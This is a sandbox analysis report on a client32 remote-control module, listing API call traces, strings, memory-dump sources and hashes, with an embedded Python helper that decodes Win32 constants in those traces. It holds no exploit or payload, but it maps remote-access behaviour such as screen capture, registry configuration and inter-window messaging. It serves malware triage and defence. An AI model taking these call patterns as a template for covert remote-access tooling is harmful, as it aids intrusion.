                                                                                • Opcode ID: 6ae8af2f14032af259bd57272b05dbbc70a801c8653cb383b5f76f4abd90dcc8
                                                                                • Instruction ID: 3df93499149cd7a4cb1b4a3ff8c52798864cd21da05d47721e0dc8214685208f
                                                                                • Opcode Fuzzy Hash: 6ae8af2f14032af259bd57272b05dbbc70a801c8653cb383b5f76f4abd90dcc8
                                                                                • Instruction Fuzzy Hash: 2491D270D0465A9FCB04DFA9C880AEEFBF5FF48304F108169E555AB294DB34A905CB90
                                                                                APIs
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 1101F564
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 1101F5B8
                                                                                • GetBkColor.GDI32(?), ref: 1101F5BE
                                                                                • GetTextColor.GDI32(?), ref: 1101F645
                                                                                  • Part of subcall function 1101EF10: GetSysColor.USER32(00000011), ref: 1101EF58
                                                                                  • Part of subcall function 1101EF10: SetTextColor.GDI32(?,00000000), ref: 1101EF63
                                                                                  • Part of subcall function 1101EF10: SetBkColor.GDI32(?,?), ref: 1101EF81
                                                                                  • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F00D
                                                                                  • Part of subcall function 1101EF10: GetSystemMetrics.USER32(00000047), ref: 1101F018
                                                                                  • Part of subcall function 1101EF10: DrawTextA.USER32(?,?,?,?,00000024), ref: 1101F056
                                                                                  • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F064
                                                                                Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Color$Text$InflateObjectRectSelect$DrawMetricsSystem
                                                                                • String ID: VUUU$VUUU
                                                                                • API String ID: 179481525-3149182767
                                                                                • Opcode ID: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
                                                                                • Instruction ID: daec56a1ae35cbc085cb1de7b5199678d62f5094ff6f4e18006982d33a32e855
                                                                                • Opcode Fuzzy Hash: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
                                                                                • Instruction Fuzzy Hash: 7F617F75E0020A9BCB04CFA8D881AAEF7F5FB58324F14466AE415A7385DB74FA05CB94
                                                                                APIs
                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 1103B476
                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1103B49C
                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1103B4C2
                                                                                Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$FolderPathSystemWindows
• String ID: "%PROG%$%SYS%$%WIN%$c:\program files
• API String ID: 1538031420-1992112792
• Opcode ID: e9a016464172d398cdd25842ee37a2f59ed83bca3c4f484902448cdd84f2952e
• Instruction ID: 2623f2ed80b282b5754acc89838a0d53b3ad1afe3f6d6f3bb9299b9b15bf7866
• Opcode Fuzzy Hash: e9a016464172d398cdd25842ee37a2f59ed83bca3c4f484902448cdd84f2952e
• Instruction Fuzzy Hash: 50412775E0461A5FCB15CE348C94BEAB7E9EF8930DF0041E8E899D7644EBB59944CB80
APIs
  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
  • Part of subcall function 110B0730: _memset.LIBCMT ref: 110B073C
  • Part of subcall function 110B0730: _memset.LIBCMT ref: 110B076D
  • Part of subcall function 110B0FA0: timeGetTime.WINMM(_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B0FA6
  • Part of subcall function 110B0FA0: timeGetTime.WINMM(111F10F8,111E6C98,?), ref: 110B1075
• WaitForSingleObject.KERNEL32(?,000000FA,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B790D
• GetDC.USER32(00000000), ref: 110B7951
• GetDeviceCaps.GDI32(00000000,0000000E), ref: 110B795C
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 110B7967
• ReleaseDC.USER32(00000000,00000000), ref: 110B7973
  • Part of subcall function 110B3560: SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
  • Part of subcall function 110B3560: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B3585
  • Part of subcall function 110B3560: CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3598
  • Part of subcall function 110B3560: CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35A5
  • Part of subcall function 110B3560: WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
  • Part of subcall function 110B3560: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B35D0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CapsDeviceObjectSingleTimeWait_memsettime$EventRelease__wcstoi64
• String ID: TraceScrape$_debug
• API String ID: 2936113293-4091781993
• Opcode ID: c0a2ef568abd564d7af5b6c1d30ae4c0d865c04e90584bcac43ba32ef6f36e6b
• Instruction ID: beb9be5f3decd216f1517493ed5af73f7f61b8e2793af04975b89e9167c73652
• Opcode Fuzzy Hash: c0a2ef568abd564d7af5b6c1d30ae4c0d865c04e90584bcac43ba32ef6f36e6b
• Instruction Fuzzy Hash: 5F41C779E042465BEB05CFA4C9C1FAF7BB5EB88704F1405A8E805AB285EA70ED04C7E4
APIs
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• InitializeCriticalSection.KERNEL32(0000000C), ref: 11061790
• RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,11195264,00000000,0002001F,00000000,00000008,?,?,00000001,00000001), ref: 110617F5
• RegCreateKeyExA.ADVAPI32(00000000,?,00000000,11195264,00000000,00020019,00000000,00000008,?), ref: 1106181C
• RegCreateKeyExA.ADVAPI32(00000000,ConfigList,00000000,11195264,00000000,0002001F,00000000,?,?), ref: 1106185B
• RegCreateKeyExA.ADVAPI32(?,ConfigList,00000000,11195264,00000000,00020019,00000000,?,?), ref: 1106188F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Create$CritiusernitializeSection_malloc_memsetwsprintf
• String ID: ConfigList$PCICTL
• API String ID: 4014706405-1939909508
• Opcode ID: 2c662ba8e1a73180234ba1d403ad4cf72de73a80d5c76a4c65f103bbd16af89e
• Instruction ID: f687ffc68a66fe95333fcb084f814ecf12f43e5332dda5a21faccb30f4540590
• Opcode Fuzzy Hash: 2c662ba8e1a73180234ba1d403ad4cf72de73a80d5c76a4c65f103bbd16af89e
• Instruction Fuzzy Hash: 205130B5A40319AFE710CF65CC85FAABBF8FB84B54F10851AF929DB280D774A504CB50
APIs
• IsWindow.USER32(?), ref: 1103B8E8
• _malloc.LIBCMT ref: 1103B97B
• _memmove.LIBCMT ref: 1103B9E0
• SendMessageTimeoutA.USER32(?,0000004A,00040310,00000007,00000002,00002710,?), ref: 1103BA40
• _free.LIBCMT ref: 1103BA47
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Message$ErrorExitLastProcessSendTimeoutWindow_free_malloc_memmovewsprintf
• String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
• API String ID: 3610575347-2270926670
• Opcode ID: 3ad59114b4505d2ff10dfcd5b1565abec2c6f4394dd92e1c2ff375fd271c0bfb
• Instruction ID: cf71befd834ca9d6d619551618e05b544aa7bc38abc68460657087db59e74738
• Opcode Fuzzy Hash: 3ad59114b4505d2ff10dfcd5b1565abec2c6f4394dd92e1c2ff375fd271c0bfb
• Instruction Fuzzy Hash: B0514F75E0061E9FDB00CB94CC81EEEF3B9BF98708F104169E526A7280E7316A06CB91
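The raw API lines above carry their Win32 constants as bare hex (the 0xFA wait and the GetDeviceCaps indices 0xE/0xC in the TraceScrape function, samDesired 0x2001F and 0x20019 in the four RegCreateKeyExA calls on ConfigList, message 0x4A with a 0x2710 ms timeout in SendMessageTimeoutA). The following Python is an added triage helper, not part of the Joe Sandbox report or of the analysed client32 module: it parses lines in the report's "APIs" format and names those constants. The sample lines are copied from this report (constructed test input); the constant tables are the documented Win32 values; the line regex and the argument positions (samDesired as the 6th RegCreateKeyExA argument, the timeout as the 6th SendMessageTimeoutA argument, and so on) are assumptions taken from the documented signatures and the lines shown here.

```python
"""Decode Win32 constants in Joe Sandbox "APIs" lines.

Added triage helper; not part of the Joe Sandbox report or of the analysed
client32 module.  SAMPLE_LINES are copied from the report (constructed test
input); the constant tables are documented Win32 values; LINE_RE and the
argument positions are assumptions based on the lines shown in the report.
"""
import re
from dataclasses import dataclass

# Constructed sample: lines copied verbatim from the report's "APIs" sections.
SAMPLE_LINES = [
    "• WaitForSingleObject.KERNEL32(?,000000FA,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B790D",
    "• GetDeviceCaps.GDI32(00000000,0000000E), ref: 110B795C",
    "• GetDeviceCaps.GDI32(00000000,0000000C), ref: 110B7967",
    "• RegCreateKeyExA.ADVAPI32(00000000,ConfigList,00000000,11195264,00000000,0002001F,00000000,?,?), ref: 1106185B",
    "• RegCreateKeyExA.ADVAPI32(?,ConfigList,00000000,11195264,00000000,00020019,00000000,?,?), ref: 1106188F",
    "• SendMessageTimeoutA.USER32(?,0000004A,00040310,00000007,00000002,00002710,?), ref: 1103BA40",
    "• SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B9661",
    "• Sleep.KERNEL32(000003E8), ref: 11027774",
]

# Assumed line format: "[• ][Part of subcall function X: ]Api.MODULE[(args)], ref: ADDR"
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[^\s(.]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_ARG = re.compile(r"^[0-9A-Fa-f]{8}$")   # the report prints integer arguments as 8 hex digits

# Documented Win32 constants (winnt.h, winuser.h, wingdi.h, winbase.h).
KEY_RIGHT_BITS = [
    (0x20000, "READ_CONTROL"), (0x1, "KEY_QUERY_VALUE"), (0x2, "KEY_SET_VALUE"),
    (0x4, "KEY_CREATE_SUB_KEY"), (0x8, "KEY_ENUMERATE_SUB_KEYS"),
    (0x10, "KEY_NOTIFY"), (0x20, "KEY_CREATE_LINK"),
]
KEY_READ, KEY_WRITE, KEY_ALL_ACCESS = 0x20019, 0x20006, 0xF003F
WINDOW_MESSAGES = {0x4A: "WM_COPYDATA"}
DEVICE_CAPS = {8: "HORZRES", 10: "VERTRES", 12: "BITSPIXEL", 14: "PLANES"}
INFINITE = 0xFFFFFFFF
# Zero-based position of the millisecond timeout/interval parameter (documented signatures).
TIMEOUT_ARG = {"WaitForSingleObject": 1, "Sleep": 0, "SetTimer": 2, "SendMessageTimeoutA": 5}


@dataclass
class Call:
    api: str
    module: str
    ref: int
    args: list
    note: str


def parse_args(text):
    """Split the argument list; 8-hex-digit tokens become ints, '?' and strings stay text."""
    if not text:
        return []
    return [int(t, 16) if HEX_ARG.match(t) else t for t in (s.strip() for s in text.split(","))]


def describe_key_rights(sam):
    """Name a registry samDesired mask: composite rights first, then the individual bits."""
    if sam == KEY_ALL_ACCESS:
        return "KEY_ALL_ACCESS"
    composite = [n for n, m in (("KEY_READ", KEY_READ), ("KEY_WRITE", KEY_WRITE)) if sam & m == m]
    bits = [name for bit, name in KEY_RIGHT_BITS if sam & bit]
    return "|".join(composite or ["0x%X" % sam]) + " (" + ",".join(bits) + ")"


def annotate(api, args):
    """Turn the raw argument list into a one-line triage note for the APIs of interest."""
    def is_int(i):
        return len(args) > i and isinstance(args[i], int)
    if api == "RegCreateKeyExA" and is_int(5):
        sub = args[1] if isinstance(args[1], str) and args[1] != "?" else "<unresolved>"
        return "registry key '%s' opened/created with %s" % (sub, describe_key_rights(args[5]))
    if api == "SendMessageTimeoutA" and is_int(1) and is_int(5):
        return "%s to another window, timeout %d ms" % (WINDOW_MESSAGES.get(args[1], "WM_0x%X" % args[1]), args[5])
    if api == "GetDeviceCaps" and is_int(1):
        return "queries display capability %s" % DEVICE_CAPS.get(args[1], "index %d" % args[1])
    idx = TIMEOUT_ARG.get(api)
    if idx is not None and is_int(idx):
        return "waits forever (INFINITE)" if args[idx] == INFINITE else "timeout/interval %d ms" % args[idx]
    return ""


def decode_line(line):
    """Parse one report line into a Call, or None if it is not an API line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = parse_args(m.group("args"))
    return Call(m.group("api"), m.group("module"), int(m.group("ref"), 16), args, annotate(m.group("api"), args))


def triage(lines):
    """Decode every API line in order, skipping headings such as 'APIs' or 'Strings'."""
    return [c for c in (decode_line(line) for line in lines) if c is not None]


if __name__ == "__main__":
    for c in triage(SAMPLE_LINES):
        print("%08X %-20s %-8s %s" % (c.ref, c.api, c.module, c.note))
```

Run against the eight sample lines, the helper reports that ConfigList is opened once with KEY_READ|KEY_WRITE and once with KEY_READ, that the 250 ms and 1000 ms waits sit in the screen-capture path next to a BITSPIXEL/PLANES probe of the display, and that message 0x4A is WM_COPYDATA sent with a 10 s timeout (the fuFlags value 2 on that line is SMTO_ABORTIFHUNG). Feeding it the whole "APIs" section of a report, rather than the hand-picked lines here, is the intended use; lines that are not API calls are skipped.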
APIs
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110276B3
• TranslateMessage.USER32(?), ref: 110276E1
• DispatchMessageA.USER32(?), ref: 110276EB
• Sleep.KERNEL32(000003E8), ref: 11027774
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110277DA
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Message$DispatchSleepTranslate
• String ID: Bridge$BridgeThread::Attempting to open bridge...
• API String ID: 3237117195-3850961587
• Opcode ID: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
• Instruction ID: fbec7a20b3d6bea2ef121ca85947d2bcd6ffbd352c9b2bb3e3957ab5b94ca35b
• Opcode Fuzzy Hash: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
• Instruction Fuzzy Hash: F241B375E026369BE711CBD5CC84EBABBA8FB58708F500539E925D3248EB359900CBA1
APIs
• GetWindowPlacement.USER32(00000000,0000002C,110C032C,?,Norm,110C032C), ref: 110B9594
• MoveWindow.USER32(00000000,110C032C,110C032C,110C032C,110C032C,00000001,?,Norm,110C032C), ref: 110B9606
• SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B9661
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
• String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
• API String ID: 1092798621-1973987134
• Opcode ID: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
• Instruction ID: 30cf71d2af311bb900ca5215c998a4de0afb875ad97720b4279f64133f28c1c1
• Opcode Fuzzy Hash: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
• Instruction Fuzzy Hash: F7411EB5B00609AFDB08DFA4C895EAEF7B5FF88304F104669E519A7344DB30B945CB90
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4AD
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4D0
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 1100F554
                                                                                • __CxxThrowException@8.LIBCMT ref: 1100F562
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100F575
                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F58F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                • String ID: bad cast
                                                                                • API String ID: 2427920155-3145022300
                                                                                • Opcode ID: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
                                                                                • Instruction ID: b8b94bd42515a6f19c70bc81b3c192d65964a6c5da2ad5a69908043983276998
                                                                                • Opcode Fuzzy Hash: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
                                                                                • Instruction Fuzzy Hash: BB31E475D002169FDB05CF64D890BEEF7B8EB05369F44066DD926A7280DB72A904CF92
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(00000264,000003E8), ref: 1113572F
                                                                                • GetTickCount.KERNEL32 ref: 1113578C
                                                                                  • Part of subcall function 111449B0: GetTickCount.KERNEL32 ref: 11144A18
                                                                                • wsprintfA.USER32 ref: 111357BC
                                                                                  • Part of subcall function 110B86C0: ExitProcess.KERNEL32 ref: 110B8702
                                                                                • WaitForSingleObject.KERNEL32(00000264,000003E8), ref: 11135802
                                                                                Strings
                                                                                • Client possibly unresponsive for %d ms (tid=%d)Callstack:, xrefs: 111357B6
                                                                                • UI.CPP, xrefs: 111357E9
                                                                                • ResponseChk, xrefs: 11135717
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountObjectSingleTickWait$ExitProcesswsprintf
                                                                                • String ID: Client possibly unresponsive for %d ms (tid=%d)Callstack:$ResponseChk$UI.CPP
                                                                                • API String ID: 2020353970-2880927372
                                                                                • Opcode ID: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
                                                                                • Instruction ID: 29029577b4cabcdd66728ddaf58dbb832e5c2d1ab8d81411842bafe300cf0b31
                                                                                • Opcode Fuzzy Hash: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
